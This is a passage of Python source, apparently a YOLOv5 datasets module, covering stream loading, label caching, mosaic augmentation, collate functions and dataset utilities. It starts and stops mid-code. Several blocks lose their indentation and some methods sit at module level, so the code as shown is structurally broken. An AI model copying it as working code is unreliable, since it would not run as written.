            self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float(
                "inf"
            )  # infinite stream fallback
            self.fps[i] = (
                max((fps if math.isfinite(fps) else 0) % 100, 0) or 30
            )  # 30 FPS fallback
            _, self.imgs[i] = cap.read()  # guarantee first frame
            self.threads[i] = Thread(
                target=self.update, args=([i, cap, s]), daemon=True
            )
            LOGGER.info(
                f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)"
            )
            self.threads[i].start()
        LOGGER.info("")  # newline
        # check for common shapes
        s = np.stack(
            [
                letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape
                for x in self.imgs
            ]
        )
        self.rect = (
            np.unique(s, axis=0).shape[0] == 1
        )  # rect inference if all shapes equal
        if not self.rect:
            LOGGER.warning(
                "WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams."
            )

    def update(self, i, cap, stream):
        """Daemon-thread loop keeping self.imgs[i] refreshed with the latest frame."""
        # Read stream `i` frames in daemon thread
        n, f, read = (
            0,
            self.frames[i],
            1,
        )  # frame number, frame array, inference every 'read' frame
        while cap.isOpened() and n < f:
            n += 1
            # _, self.imgs[index] = cap.read()
            cap.grab()
            if n % read == 0:
                success, im = cap.retrieve()
                if success:
                    self.imgs[i] = im
                else:
                    LOGGER.warning(
                        "WARNING: Video stream unresponsive, please check your IP camera connection."
                    )
                    self.imgs[i] = np.zeros_like(self.imgs[i])
                    cap.open(stream)  # re-open stream if signal was lost
            time.sleep(1 / self.fps[i])  # wait time

    def __iter__(self):
        """Reset the batch counter and return self."""
        self.count = -1
        return self

    def __next__(self):
        """Return (sources, letterboxed BCHW RGB batch, raw frames, None, '')."""
        self.count += 1
        # Stop when any reader thread has died or the user presses 'q'.
        if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord(
            "q"
        ):  # q to quit
            cv2.destroyAllWindows()
            raise StopIteration
        # Letterbox
        img0 = self.imgs.copy()
        img = [
            letterbox(
                x, self.img_size, stride=self.stride, auto=self.rect and self.auto
            )[0]
            for x in img0
        ]
        # Stack
        img = np.stack(img, 0)
        # Convert
        img = img[..., ::-1].transpose((0, 3, 1, 2))  # BGR to RGB, BHWC to BCHW
        img = np.ascontiguousarray(img)
        return self.sources, img, img0, None, ""

    def __len__(self):
        return len(self.sources)  # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
    """Derive label-file paths from image paths (.../images/x.jpg -> .../labels/x.txt)."""
    images_dir = os.sep + "images" + os.sep  # /images/ substring
    labels_dir = os.sep + "labels" + os.sep  # /labels/ substring
    label_paths = []
    for img_path in img_paths:
        # Swap only the LAST /images/ component, then replace the extension.
        swapped = labels_dir.join(img_path.rsplit(images_dir, 1))
        label_paths.append(swapped.rsplit(".", 1)[0] + ".txt")
    return label_paths
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(
self,
path,
img_size=640,
batch_size=16,
augment=False,
hyp=None,
rect=False,
image_weights=False,
cache_images=False,
single_cls=False,
stride=32,
pad=0.0,
prefix="",
):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = (
self.augment and not self.rect
) # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / "**" / "*.*"), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [
x.replace("./", parent) if x.startswith("./") else x
for x in t
] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f"{prefix}{p} does not exist")
self.im_files = sorted(
x.replace("/", os.sep)
for x in f
if x.split(".")[-1].lower() in IMG_FORMATS
)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.im_files, f"{prefix}No images found"
except Exception as e:
raise Exception(
f"{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}"
)
# Check cache
self.label_files = img2label_paths(self.im_files) # labels
cache_path = (
p if p.is_file() else Path(self.label_files[0]).parent
).with_suffix(".cache")
try:
cache, exists = (
np.load(cache_path, allow_pickle=True).item(),
True,
) # load dict
assert cache["version"] == self.cache_version # same version
assert cache["hash"] == get_hash(
self.label_files + self.im_files
) # same hash
except Exception:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop(
"results"
) # found, missing, empty, corrupt, total
if exists and LOCAL_RANK in (-1, 0):
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupt"
tqdm(
None, desc=prefix + d, total=n, initial=n, bar_format=BAR_FORMAT
) # display cache results
if cache["msgs"]:
LOGGER.info("\n".join(cache["msgs"])) # display warnings
assert (
nf > 0 or not augment
), f"{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}"
# Read cache
[cache.pop(k) for k in ("hash", "version", "msgs")] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.im_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.im_files = [self.im_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = (
np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int)
* stride
)
# Cache images into RAM/disk for faster training (WARNING: large datasets may exceed system resources)
self.ims = [None] * n
self.npy_files = [Path(f).with_suffix(".npy") for f in self.im_files]
if cache_images:
gb = 0 # Gigabytes of cached images
self.im_hw0, self.im_hw = [None] * n, [None] * n
fcn = (
self.cache_images_to_disk if cache_images == "disk" else self.load_image
)
results = ThreadPool(NUM_THREADS).imap(fcn, range(n))
pbar = tqdm(
enumerate(results),
total=n,
bar_format=BAR_FORMAT,
disable=LOCAL_RANK > 0,
)
for i, x in pbar:
if cache_images == "disk":
gb += self.npy_files[i].stat().st_size
else: # 'ram'
(
self.ims[i],
self.im_hw0[i],
self.im_hw[i],
) = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.ims[i].nbytes
pbar.desc = f"{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})"
pbar.close()
    def cache_labels(self, path=Path("./labels.cache"), prefix=""):
        """Verify every image/label pair in parallel and persist the results to `path`.

        Returns:
            dict: im_file -> [labels, shape, segments] entries plus the
            bookkeeping keys "hash", "results", "msgs", and "version".
        """
        # Cache dataset labels, check images and read shapes
        x = {}  # dict
        nm, nf, ne, nc, msgs = (
            0,
            0,
            0,
            0,
            [],
        )  # number missing, found, empty, corrupt, messages
        desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
        with Pool(NUM_THREADS) as pool:
            pbar = tqdm(
                pool.imap(
                    verify_image_label,
                    zip(self.im_files, self.label_files, repeat(prefix)),
                ),
                desc=desc,
                total=len(self.im_files),
                bar_format=BAR_FORMAT,
            )
            for im_file, lb, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
                nm += nm_f
                nf += nf_f
                ne += ne_f
                nc += nc_f
                if im_file:
                    x[im_file] = [lb, shape, segments]
                if msg:
                    msgs.append(msg)
                pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupt"
        pbar.close()
        if msgs:
            LOGGER.info("\n".join(msgs))
        if nf == 0:
            LOGGER.warning(
                f"{prefix}WARNING: No labels found in {path}. See {HELP_URL}"
            )
        x["hash"] = get_hash(self.label_files + self.im_files)
        x["results"] = nf, nm, ne, nc, len(self.im_files)
        x["msgs"] = msgs  # warnings
        x["version"] = self.cache_version  # cache version
        try:
            np.save(path, x)  # save cache for next time
            # np.save always appends .npy; rename back to the .cache name.
            path.with_suffix(".cache.npy").rename(path)  # remove .npy suffix
            LOGGER.info(f"{prefix}New cache created: {path}")
        except Exception as e:
            LOGGER.warning(
                f"{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}"
            )  # not writeable
        return x
    def __len__(self):
        """Number of images in the dataset."""
        return len(self.im_files)

    # def __iter__(self):
    #     self.count = -1
    #     print('ran dataset iter')
    #     #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
    #     return self
    def __getitem__(self, index):
        """Return one sample: (CHW RGB float-ready tensor, labels (n, 6), path, shapes).

        Labels are [image-index placeholder, class, x, y, w, h] normalized;
        column 0 is filled by the collate function. `shapes` is None for
        mosaic samples, else ((h0, w0), (ratio, pad)) for COCO mAP rescaling.
        """
        index = self.indices[index]  # linear, shuffled, or image_weights
        hyp = self.hyp
        mosaic = self.mosaic and random.random() < hyp["mosaic"]
        if mosaic:
            # Load mosaic
            img, labels = self.load_mosaic(index)
            shapes = None
            # MixUp augmentation
            if random.random() < hyp["mixup"]:
                img, labels = mixup(
                    img, labels, *self.load_mosaic(random.randint(0, self.n - 1))
                )
        else:
            # Load image
            img, (h0, w0), (h, w) = self.load_image(index)
            # Letterbox
            shape = (
                self.batch_shapes[self.batch[index]] if self.rect else self.img_size
            )  # final letterboxed shape
            img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
            shapes = (h0, w0), ((h / h0, w / w0), pad)  # for COCO mAP rescaling
            labels = self.labels[index].copy()
            if labels.size:  # normalized xywh to pixel xyxy format
                labels[:, 1:] = xywhn2xyxy(
                    labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1]
                )
            if self.augment:
                img, labels = random_perspective(
                    img,
                    labels,
                    degrees=hyp["degrees"],
                    translate=hyp["translate"],
                    scale=hyp["scale"],
                    shear=hyp["shear"],
                    perspective=hyp["perspective"],
                )
        nl = len(labels)  # number of labels
        if nl:
            # back to normalized xywh for training
            labels[:, 1:5] = xyxy2xywhn(
                labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1e-3
            )
        if self.augment:
            # Albumentations
            img, labels = self.albumentations(img, labels)
            nl = len(labels)  # update after albumentations
            # HSV color-space
            augment_hsv(img, hgain=hyp["hsv_h"], sgain=hyp["hsv_s"], vgain=hyp["hsv_v"])
            # Flip up-down
            if random.random() < hyp["flipud"]:
                img = np.flipud(img)
                if nl:
                    labels[:, 2] = 1 - labels[:, 2]
            # Flip left-right
            if random.random() < hyp["fliplr"]:
                img = np.fliplr(img)
                if nl:
                    labels[:, 1] = 1 - labels[:, 1]
            # Cutouts
            # labels = cutout(img, labels, p=0.5)
            # nl = len(labels)  # update after cutout
        labels_out = torch.zeros((nl, 6))
        if nl:
            labels_out[:, 1:] = torch.from_numpy(labels)
        # Convert
        img = img.transpose((2, 0, 1))[::-1]  # HWC to CHW, BGR to RGB
        img = np.ascontiguousarray(img)
        return torch.from_numpy(img), labels_out, self.im_files[index], shapes
    def load_image(self, i):
        """Load image `i` from RAM cache, .npy cache, or disk.

        Returns:
            (im, (h0, w0), (h, w)): image resized so its long side equals
            `self.img_size`, the original hw, and the resized hw.
        """
        # Loads 1 image from dataset index 'i', returns (im, original hw, resized hw)
        im, f, fn = (
            self.ims[i],
            self.im_files[i],
            self.npy_files[i],
        )
        if im is None:  # not cached in RAM
            if fn.exists():  # load npy
                im = np.load(fn)
            else:  # read image
                im = cv2.imread(f)  # BGR
                assert im is not None, f"Image Not Found {f}"
            h0, w0 = im.shape[:2]  # orig hw
            r = self.img_size / max(h0, w0)  # ratio
            if r != 1:  # if sizes are not equal
                # LINEAR when upscaling/augmenting, AREA for plain downscaling.
                im = cv2.resize(
                    im,
                    (int(w0 * r), int(h0 * r)),
                    interpolation=cv2.INTER_LINEAR
                    if (self.augment or r > 1)
                    else cv2.INTER_AREA,
                )
            return im, (h0, w0), im.shape[:2]  # im, hw_original, hw_resized
        else:
            return (
                self.ims[i],
                self.im_hw0[i],
                self.im_hw[i],
            )  # im, hw_original, hw_resized
def cache_images_to_disk(self, i):
    """Write image *i* to its .npy cache file for faster future loading."""
    target = self.npy_files[i]
    if target.exists():
        return  # already cached, nothing to do
    np.save(target.as_posix(), cv2.imread(self.im_files[i]))
def load_mosaic(self, index):
    # YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
    """Build a 2s x 2s mosaic around a random center from image *index* plus
    3 randomly chosen images; returns (img4, labels4) after augmentation,
    with labels in pixel xyxy coordinates on the mosaic canvas."""
    labels4, segments4 = [], []
    s = self.img_size
    # Random mosaic center; mosaic_border is negative, so the center falls
    # inside the middle portion of the 2s x 2s canvas.
    yc, xc = (
        int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border
    )  # mosaic center x, y
    indices = [index] + random.choices(
        self.indices, k=3
    )  # 3 additional image indices
    random.shuffle(indices)
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = self.load_image(index)
        # place img in img4: each branch computes the destination window on the
        # large canvas (a-coords) and the matching source window (b-coords).
        if i == 0:  # top left
            img4 = np.full(
                (s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8
            )  # base image with 4 tiles, gray (114) background
            x1a, y1a, x2a, y2a = (
                max(xc - w, 0),
                max(yc - h, 0),
                xc,
                yc,
            )  # xmin, ymin, xmax, ymax (large image)
            x1b, y1b, x2b, y2b = (
                w - (x2a - x1a),
                h - (y2a - y1a),
                w,
                h,
            )  # xmin, ymin, xmax, ymax (small image)
        elif i == 1:  # top right
            x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
            x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
        elif i == 2:  # bottom left
            x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
        elif i == 3:  # bottom right
            x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
        img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # img4[ymin:ymax, xmin:xmax]
        # Per-tile label offsets from source to canvas coordinates.
        padw = x1a - x1b
        padh = y1a - y1b
        # Labels
        labels, segments = self.labels[index].copy(), self.segments[index].copy()
        if labels.size:
            labels[:, 1:] = xywhn2xyxy(
                labels[:, 1:], w, h, padw, padh
            )  # normalized xywh to pixel xyxy format
            segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
        labels4.append(labels)
        segments4.extend(segments)
    # Concat/clip labels
    labels4 = np.concatenate(labels4, 0)
    for x in (labels4[:, 1:], *segments4):
        np.clip(x, 0, 2 * s, out=x)  # clip when using random_perspective()
    # img4, labels4 = replicate(img4, labels4)  # replicate
    # Augment
    img4, labels4, segments4 = copy_paste(
        img4, labels4, segments4, p=self.hyp["copy_paste"]
    )
    img4, labels4 = random_perspective(
        img4,
        labels4,
        segments4,
        degrees=self.hyp["degrees"],
        translate=self.hyp["translate"],
        scale=self.hyp["scale"],
        shear=self.hyp["shear"],
        perspective=self.hyp["perspective"],
        border=self.mosaic_border,
    )  # border to remove
    return img4, labels4
def load_mosaic9(self, index):
    # YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
    """Build a 3x3 mosaic from image *index* plus 8 random images, then crop a
    random 2s x 2s window; returns (img9, labels9) after augmentation."""
    labels9, segments9 = [], []
    s = self.img_size
    indices = [index] + random.choices(
        self.indices, k=8
    )  # 8 additional image indices
    random.shuffle(indices)
    hp, wp = -1, -1  # height, width previous
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = self.load_image(index)
        # place img in img9: each branch computes the tile's xyxy window `c` on
        # the 3s x 3s canvas, relative to the center tile at (s, s).
        if i == 0:  # center
            img9 = np.full(
                (s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8
            )  # base image with 3x3 tiles, gray (114) background
            h0, w0 = h, w
            c = s, s, s + w, s + h  # xmin, ymin, xmax, ymax (base) coordinates
        elif i == 1:  # top
            c = s, s - h, s + w, s
        elif i == 2:  # top right
            c = s + wp, s - h, s + wp + w, s
        elif i == 3:  # right
            c = s + w0, s, s + w0 + w, s + h
        elif i == 4:  # bottom right
            c = s + w0, s + hp, s + w0 + w, s + hp + h
        elif i == 5:  # bottom
            c = s + w0 - w, s + h0, s + w0, s + h0 + h
        elif i == 6:  # bottom left
            c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
        elif i == 7:  # left
            c = s - w, s + h0 - h, s, s + h0
        elif i == 8:  # top left
            c = s - w, s + h0 - hp - h, s, s + h0 - hp
        padx, pady = c[:2]
        x1, y1, x2, y2 = (max(x, 0) for x in c)  # allocate coords
        # Labels
        labels, segments = self.labels[index].copy(), self.segments[index].copy()
        if labels.size:
            labels[:, 1:] = xywhn2xyxy(
                labels[:, 1:], w, h, padx, pady
            )  # normalized xywh to pixel xyxy format
            segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
        labels9.append(labels)
        segments9.extend(segments)
        # Image: copy only the part of the tile that lies on the canvas.
        img9[y1:y2, x1:x2] = img[
            y1 - pady :, x1 - padx :
        ]  # img9[ymin:ymax, xmin:xmax]
        hp, wp = h, w  # height, width previous
    # Offset: crop a random 2s x 2s window out of the 3s x 3s canvas.
    yc, xc = (
        int(random.uniform(0, s)) for _ in self.mosaic_border
    )  # mosaic center x, y
    img9 = img9[yc : yc + 2 * s, xc : xc + 2 * s]
    # Concat/clip labels: shift them into the cropped window's coordinates.
    labels9 = np.concatenate(labels9, 0)
    labels9[:, [1, 3]] -= xc
    labels9[:, [2, 4]] -= yc
    c = np.array([xc, yc])  # centers
    segments9 = [x - c for x in segments9]
    for x in (labels9[:, 1:], *segments9):
        np.clip(x, 0, 2 * s, out=x)  # clip when using random_perspective()
    # img9, labels9 = replicate(img9, labels9)  # replicate
    # Augment
    img9, labels9 = random_perspective(
        img9,
        labels9,
        segments9,
        degrees=self.hyp["degrees"],
        translate=self.hyp["translate"],
        scale=self.hyp["scale"],
        shear=self.hyp["shear"],
        perspective=self.hyp["perspective"],
        border=self.mosaic_border,
    )  # border to remove
    return img9, labels9
@staticmethod
def collate_fn(batch):
im, label, path, shapes = zip(*batch) # transposed
for i, lb in enumerate(label):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
    """Quad-collate: merge every 4 samples into 1, either by 2x upscaling a
    single image or by tiling four images into a 2x2 mosaic (labels shifted
    and scaled to match)."""
    img, label, path, shapes = zip(*batch)  # transposed
    n = len(shapes) // 4
    im4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
    # Offset/scale rows applied to (cls, idx, x, y, w, h) label tensors when
    # four images are combined on one canvas.
    ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
    wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
    s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]])  # scale
    for i in range(n):  # zidane torch.zeros(16,3,720,1280) # BCHW
        i *= 4
        if random.random() < 0.5:
            # 50%: upscale one image by 2; its labels stay unchanged.
            im = F.interpolate(
                img[i].unsqueeze(0).float(),
                scale_factor=2.0,
                mode="bilinear",
                align_corners=False,
            )[0].type(img[i].type())
            lb = label[i]
        else:
            # Otherwise: tile 4 images 2x2 and shift/scale their labels.
            im = torch.cat(
                (
                    torch.cat((img[i], img[i + 1]), 1),
                    torch.cat((img[i + 2], img[i + 3]), 1),
                ),
                2,
            )
            lb = (
                torch.cat(
                    (
                        label[i],
                        label[i + 1] + ho,
                        label[i + 2] + wo,
                        label[i + 3] + ho + wo,
                    ),
                    0,
                )
                * s
            )
        im4.append(im)
        label4.append(lb)
    for i, lb in enumerate(label4):
        lb[:, 0] = i  # add target image index for build_targets()
    return torch.stack(im4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def create_folder(path="./new"):
    """Create an empty directory at *path*, replacing any existing one."""
    # Wipe a pre-existing directory first so the result is always empty.
    if os.path.exists(path):
        shutil.rmtree(path)
    os.makedirs(path)
def flatten_recursive(path=DATASETS_DIR / "coco128"):
    """Copy every file found under *path* into a flat '<path>_flat' directory."""
    flat_dir = Path(str(path) + "_flat")
    create_folder(flat_dir)  # fresh, empty destination
    pattern = str(Path(path)) + "/**/*.*"
    for file in tqdm(glob.glob(pattern, recursive=True)):
        shutil.copyfile(file, flat_dir / Path(file).name)
def extract_boxes(
    path=DATASETS_DIR / "coco128",
):  # from utils.datasets import *; extract_boxes()
    """Convert a detection dataset into a classification dataset: crop every
    labelled box (padded by 20% + 3px) into path/classifier/<class>/*.jpg.

    Arguments
        path: dataset images directory
    """
    path = Path(path)  # images dir
    shutil.rmtree(path / "classifier") if (
        path / "classifier"
    ).is_dir() else None  # remove existing
    files = list(path.rglob("*.*"))
    n = len(files)  # number of files
    for im_file in tqdm(files, total=n):
        if im_file.suffix[1:] in IMG_FORMATS:
            # image
            im = cv2.imread(str(im_file))[..., ::-1]  # BGR to RGB
            h, w = im.shape[:2]
            # labels
            lb_file = Path(img2label_paths([str(im_file)])[0])
            if Path(lb_file).exists():
                with open(lb_file) as f:
                    lb = np.array(
                        [x.split() for x in f.read().strip().splitlines()],
                        dtype=np.float32,
                    )  # labels
                for j, x in enumerate(lb):
                    c = int(x[0])  # class
                    f = (
                        (path / "classifier")
                        / f"{c}"
                        / f"{path.stem}_{im_file.stem}_{j}.jpg"
                    )  # new filename
                    if not f.parent.is_dir():
                        f.parent.mkdir(parents=True)
                    b = x[1:] * [w, h, w, h]  # box
                    # b[2:] = b[2:].max()  # rectangle to square
                    b[2:] = b[2:] * 1.2 + 3  # pad
                    # FIX: np.int was removed in NumPy 1.24; use the builtin int.
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
                    b[[0, 2]] = np.clip(b[[0, 2]], 0, w)  # clip boxes outside of image
                    b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
                    assert cv2.imwrite(
                        str(f), im[b[1] : b[3], b[0] : b[2]]
                    ), f"box failure in {f}"
def autosplit(
    path=DATASETS_DIR / "coco128/images", weights=(0.9, 0.1, 0.0), annotated_only=False
):
    """Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
    Usage: from utils.datasets import *; autosplit()
    Arguments
    path: Path to images directory
    weights: Train, val, test weights (list, tuple)
    annotated_only: Only use images with an annotated txt file
    """
    path = Path(path)  # images dir
    files = sorted(
        x for x in path.rglob("*.*") if x.suffix[1:].lower() in IMG_FORMATS
    )  # image files only
    n = len(files)  # number of files
    random.seed(0)  # for reproducibility
    indices = random.choices(
        [0, 1, 2], weights=weights, k=n
    )  # assign each image to a split
    txt = [
        "autosplit_train.txt",
        "autosplit_val.txt",
        "autosplit_test.txt",
    ]  # 3 txt files
    # FIX: remove existing split files with a plain loop -- a list
    # comprehension executed only for its side effects is an anti-pattern.
    for x in txt:
        (path.parent / x).unlink(missing_ok=True)
    print(
        f"Autosplitting images from {path}"
        + ", using *.txt labeled images only" * annotated_only
    )
    for i, img in tqdm(zip(indices, files), total=n):
        if (
            not annotated_only or Path(img2label_paths([str(img)])[0]).exists()
        ):  # check label
            with open(path.parent / txt[i], "a") as f:
                f.write(
                    "./" + img.relative_to(path.parent).as_posix() + "\n"
                )  # add image to txt file
def verify_image_label(args):
    """Verify one image-label pair.

    Arguments
        args: (im_file, lb_file, prefix) tuple
    Returns
        (im_file, lb, shape, segments, nm, nf, ne, nc, msg) on success, where
        nm/nf/ne/nc count missing/found/empty/corrupt; on failure a list of
        four Nones followed by the counters and a warning message.
    """
    im_file, lb_file, prefix = args
    nm, nf, ne, nc, msg, segments = (
        0,
        0,
        0,
        0,
        "",
        [],
    )  # number (missing, found, empty, corrupt), message, segments
    try:
        # verify images
        im = Image.open(im_file)
        im.verify()  # PIL verify
        shape = exif_size(im)  # image size
        assert (shape[0] > 9) & (shape[1] > 9), f"image size {shape} <10 pixels"
        assert im.format.lower() in IMG_FORMATS, f"invalid image format {im.format}"
        if im.format.lower() in ("jpg", "jpeg"):
            with open(im_file, "rb") as f:
                f.seek(-2, 2)
                if f.read() != b"\xff\xd9":  # corrupt JPEG (missing EOI marker)
                    ImageOps.exif_transpose(Image.open(im_file)).save(
                        im_file, "JPEG", subsampling=0, quality=100
                    )
                    msg = f"{prefix}WARNING: {im_file}: corrupt JPEG restored and saved"
        # verify labels
        if os.path.isfile(lb_file):
            nf = 1  # label found
            with open(lb_file) as f:
                lb = [x.split() for x in f.read().strip().splitlines() if len(x)]
                if any(len(x) > 6 for x in lb):  # is segment
                    classes = np.array([x[0] for x in lb], dtype=np.float32)
                    segments = [
                        np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in lb
                    ]  # (cls, xy1...)
                    lb = np.concatenate(
                        (classes.reshape(-1, 1), segments2boxes(segments)), 1
                    )  # (cls, xywh)
                lb = np.array(lb, dtype=np.float32)
            nl = len(lb)
            if nl:
                assert (
                    lb.shape[1] == 5
                ), f"labels require 5 columns, {lb.shape[1]} columns detected"
                assert (lb >= 0).all(), f"negative label values {lb[lb < 0]}"
                assert (
                    lb[:, 1:] <= 1
                ).all(), f"non-normalized or out of bounds coordinates {lb[:, 1:][lb[:, 1:] > 1]}"
                _, i = np.unique(lb, axis=0, return_index=True)
                if len(i) < nl:  # duplicate row check
                    lb = lb[i]  # remove duplicates
                    if segments:
                        # FIX: a Python list cannot be indexed by a numpy index
                        # array; select the kept segments element by element.
                        segments = [segments[x] for x in i]
                    msg = f"{prefix}WARNING: {im_file}: {nl - len(i)} duplicate labels removed"
            else:
                ne = 1  # label empty
                lb = np.zeros((0, 5), dtype=np.float32)
        else:
            nm = 1  # label missing
            lb = np.zeros((0, 5), dtype=np.float32)
        return im_file, lb, shape, segments, nm, nf, ne, nc, msg
    except Exception as e:
        nc = 1
        msg = f"{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}"
        return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(
    path="coco128.yaml", autodownload=False, verbose=False, profile=False, hub=False
):
    """Return dataset statistics dictionary with images and instances counts per split per class
    To run in parent directory: export PYTHONPATH="$PWD/yolov5"
    Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
    Usage2: from utils.datasets import *; dataset_stats('path/to/coco128_with_yaml.zip')
    Arguments
    path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
    autodownload: Attempt to download dataset if not found locally
    verbose: Print stats dictionary
    """

    def round_labels(labels):
        # Update labels to integer class and 6 decimal place floats
        return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]

    def unzip(path):
        # Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
        if str(path).endswith(".zip"):  # path is data.zip
            assert Path(path).is_file(), f"Error unzipping {path}, file not found"
            ZipFile(path).extractall(path=path.parent)  # unzip
            dir = path.with_suffix("")  # dataset directory == zip name
            return (
                True,
                str(dir),
                next(dir.rglob("*.yaml")),
            )  # zipped, data_dir, yaml_path
        else:  # path is data.yaml
            return False, None, path

    def hub_ops(f, max_dim=1920):
        # HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
        f_new = im_dir / Path(f).name  # dataset-hub image filename
        try:  # use PIL
            im = Image.open(f)
            r = max_dim / max(im.height, im.width)  # ratio
            if r < 1.0:  # image too large
                im = im.resize((int(im.width * r), int(im.height * r)))
            im.save(f_new, "JPEG", quality=75, optimize=True)  # save
        except Exception as e:  # use OpenCV
            print(f"WARNING: HUB ops PIL failure {f}: {e}")
            im = cv2.imread(f)
            im_height, im_width = im.shape[:2]
            r = max_dim / max(im_height, im_width)  # ratio
            if r < 1.0:  # image too large
                im = cv2.resize(
                    im,
                    (int(im_width * r), int(im_height * r)),
                    interpolation=cv2.INTER_AREA,
                )
            cv2.imwrite(str(f_new), im)

    # Resolve the yaml (unzipping first if a .zip was given) and load it.
    zipped, data_dir, yaml_path = unzip(Path(path))
    with open(check_yaml(yaml_path), errors="ignore") as f:
        data = yaml.safe_load(f)  # data dict
    if zipped:
        data["path"] = data_dir  # TODO: should this be dir.resolve()?
    check_dataset(data, autodownload)  # download dataset if missing
    hub_dir = Path(data["path"] + ("-hub" if hub else ""))
    stats = {"nc": data["nc"], "names": data["names"]}  # statistics dictionary
    for split in "train", "val", "test":
        if data.get(split) is None:
